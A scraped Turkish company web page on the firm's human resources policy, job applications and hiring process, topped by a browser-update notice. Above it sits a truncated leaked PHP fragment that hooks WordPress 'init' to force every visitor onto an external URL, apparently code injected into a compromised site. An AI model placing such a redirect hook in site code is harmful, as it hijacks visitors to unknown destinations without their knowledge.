window.open("' . esc_url($external_url) . '", "_blank");'; // Perform the redirection wp_redirect($external_url); exit; } // Hook the function to an appropriate action, e.g., 'init' add_action('init', 'automatic_redirect_to_external_site');
IE Warning
YOUR BROWSER IS OUT OF DATE!

This website uses the latest web technologies so it requires an up-to-date, fast browser!
Please try Firefox or Chrome!
 
 
 
 

İnsan Kaynakları Politikamız

 

 

İnsan Kaynakları Politikamız

 

Karşılıklı güven ve etik değerlerin ön planda olduğu ilkelerimiz insan kaynakları politikamızın temelidir. Perde, döşemelik kumaş, mobilya, aksesuar, duvar kağıdı, inşaat, gayrimenkul ve danışmanlık gibi birçok alanda faaliyet gösteren şirketimiz, büyüme hedefleri ve stratejileri ile insan kaynakları politikalarını belirlemektedir.

 

2006 yılından bu yana, müşteri portföyümüzü 7 kat arttırarak güven ve kalitemizi taçlandıran şirketimiz, çalışanlarının motivasyonunu ve bağlılığını arttıracak bir ortam yaratmak, çalışanların gelişimine yatırım yapmak, bu ortamın korunup geliştirilmesi için gerekli politikaları ve teknik bilgiyi oluşturarak nitelikli eleman yetiştirmektedir.

 

Kariyer ve İş Olanakları

 

Web sitemizin iletişim bölümünden bizlere telefon veya mail yoluyla ulaşabilir, firmamız hakkında bilgi alabilir, merkezimize gelerek CV’nizi bırakabilirsiniz. info@goccina.com.tr adresine Word formatındaki CV’leriniz ile başvuruda bulunurken, ilgilendiğiniz pozisyon hakkında bilgilendirmeyi unutmayınız.

 

Başvuru ve İşe Alım Süreci

 

CV/Özgeçmişinizin bize ulaşması ile birlikte başvuru süreciniz başlamış olacaktır. İlk olarak bilgi ve deneyimleriniz değerlendirilmekte ve varsa aranan pozisyonlarımızla eşleştirilmektedir.

 

CV/Özgeçmişinizde verdiğiniz bilgiler ve deneyimleriniz doğrultusunda aranan pozisyonlar için uygun olduğunuz saptandığında, sizinle temasa geçilerek iş görüşmesine davet edilirsiniz.

 

Açık pozisyonlarla eşleşmeyen Özgeçmişler veri tabanımızda saklanmakta, uygun pozisyon oluşması halinde adaylarla irtibata geçilmektedir.

 

İlginiz için teşekkür ederiz.